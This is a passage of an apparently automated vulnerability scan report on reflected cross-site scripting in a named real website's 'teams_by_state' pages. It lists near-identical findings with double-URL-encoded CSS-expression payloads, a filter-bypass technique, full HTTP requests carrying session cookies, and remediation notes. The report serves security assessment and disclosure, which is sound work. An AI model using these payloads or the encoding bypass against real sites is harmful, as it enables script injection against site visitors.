The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Ottawa?885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:36 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 772666346:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=928
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 87508


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Ottawa</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<sc
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=260194&885e7%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527749e6052f63=1&885e7%27style%3d%27x%3aexpression%28alert%281%29%29%27749e6052f63=1&885e7'style='x:expression(alert(1))'749e6052f63=1&fromsla=T'>
...[SNIP]...

2.224. http://www.turnerlicensing.com/teams_by_state/Pennsylvania [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Pennsylvania

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ffcbc'style='x:expression(alert(1))'ef6395e1920 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Pennsylvania?ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:39 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328766236:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=912
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111623


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Pennsylvania</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175672&ffcbc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef6395e1920=1&ffcbc'style='x:expression(alert(1))'ef6395e1920=1&ffcbc%27style%3d%27x%3aexpression%28alert%281%29%29%27ef6395e1920=1&fromsla=T'>
...[SNIP]...

2.225. http://www.turnerlicensing.com/teams_by_state/Rhode-Island [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Rhode-Island

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a84dc'style='x:expression(alert(1))'17befc6fc54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Rhode-Island?a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:30 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -1590878181:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=997
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 60061


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Rhode Island</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
nsing.com/s.nl?sc=77&category=175740&a84dc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252717befc6fc54=1&a84dc%27style%3d%27x%3aexpression%28alert%281%29%29%2717befc6fc54=1&fromsla=T&a84dc'style='x:expression(alert(1))'17befc6fc54=1'>
...[SNIP]...

2.226. http://www.turnerlicensing.com/teams_by_state/South-Carolina [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/South-Carolina

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62e79'style='x:expression(alert(1))'dc0d0d2a4ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/South-Carolina?62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:40 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -259173507:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110580


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>South Carolina</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scr
...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=175742&62e79%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527dc0d0d2a4ae=1&62e79%27style%3d%27x%3aexpression%28alert%281%29%29%27dc0d0d2a4ae=1&62e79'style='x:expression(alert(1))'dc0d0d2a4ae=1&fromsla=T'>
...[SNIP]...

2.227. http://www.turnerlicensing.com/teams_by_state/South-Dakota [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/South-Dakota

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29abe'style='x:expression(alert(1))'456eef5a39 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/South-Dakota?29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:29 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:22 GMT
NS_RTIMER_COMPOSITE: -259176447:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=966
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 54518


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>South Dakota</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
censing.com/s.nl?sc=77&category=175745&29abe%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527456eef5a39=1&29abe%27style%3d%27x%3aexpression%28alert%281%29%29%27456eef5a39=1&fromsla=T&29abe'style='x:expression(alert(1))'456eef5a39=1'>
...[SNIP]...

2.228. http://www.turnerlicensing.com/teams_by_state/Tennessee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Tennessee

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a95b2'style='x:expression(alert(1))'349b7eab0ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Tennessee?a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -109242345:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=812
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110772


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tennessee</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175746&a95b2%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527349b7eab0ec=1&a95b2'style='x:expression(alert(1))'349b7eab0ec=1&a95b2%27style%3d%27x%3aexpression%28alert%281%29%29%27349b7eab0ec=1&fromsla=T'>
...[SNIP]...

2.229. http://www.turnerlicensing.com/teams_by_state/Texas [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Texas

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4e897'style='x:expression(alert(1))'fd511f150a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Texas?4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:45 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328767861:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=945
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 111340


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Texas</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scr
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175748&4e897%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527fd511f150a8=1&4e897'style='x:expression(alert(1))'fd511f150a8=1&4e897%27style%3d%27x%3aexpression%28alert%281%29%29%27fd511f150a8=1&fromsla=T'>
...[SNIP]...

2.230. http://www.turnerlicensing.com/teams_by_state/Toronto [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Toronto

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f3d65'style='x:expression(alert(1))'87f866157d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Toronto?f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 226405503:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=903
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 110176


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Toronto</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<s
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175762&f3d65%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252787f866157d7=1&f3d65'style='x:expression(alert(1))'87f866157d7=1&f3d65%27style%3d%27x%3aexpression%28alert%281%29%29%2787f866157d7=1&fromsla=T'>
...[SNIP]...

2.231. http://www.turnerlicensing.com/teams_by_state/Utah [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Utah

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d76ae'style='x:expression(alert(1))'9da4365e664 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Utah?d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:49 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: 328769207:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=925
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 109978


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Utah</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
<scri
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=77&category=175750&d76ae%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279da4365e664=1&d76ae'style='x:expression(alert(1))'9da4365e664=1&fromsla=T&d76ae%27style%3d%27x%3aexpression%28alert%281%29%29%279da4365e664=1'>
...[SNIP]...

2.232. http://www.turnerlicensing.com/teams_by_state/Vancouver [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Vancouver

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d512d'style='x:expression(alert(1))'0ec04acb8d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack shown uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /teams_by_state/Vancouver?d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=CpFtMyLf4JyGJQbk8S7cc6QZP8CTcd29KBDjw5TCCTwzYV4CTqpFNDk1knBZJ2vJKXJqVXNvFvNyfv2s2WcQWFT8wrDl2PyTPJKQNJxNL95nTQYtz6d1n9BVkxKQc60B!1338605686; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274805.1290274971.9; __utmc=1; __utmb=1.5.10.1290274971;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 17:52:42 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 17:52:31 GMT
NS_RTIMER_COMPOSITE: -2034775682:73686F702D6A6176613033302E7376616C652E6E65746C65646765722E636F6D:80
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=933
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 82072


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Vancouver</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>

...[SNIP]...
turnerlicensing.com/s.nl?sc=77&category=261600&d512d%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25270ec04acb8d9=1&d512d%27style%3d%27x%3aexpression%28alert%281%29%29%270ec04acb8d9=1&d512d'style='x:expression(alert(1))'0ec04acb8d9=1&fromsla=T'>
...[SNIP]...

2.233. http://www.turnerlicensing.com/teams_by_state/Vermont [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /teams_by_state/Vermont

Issue detail

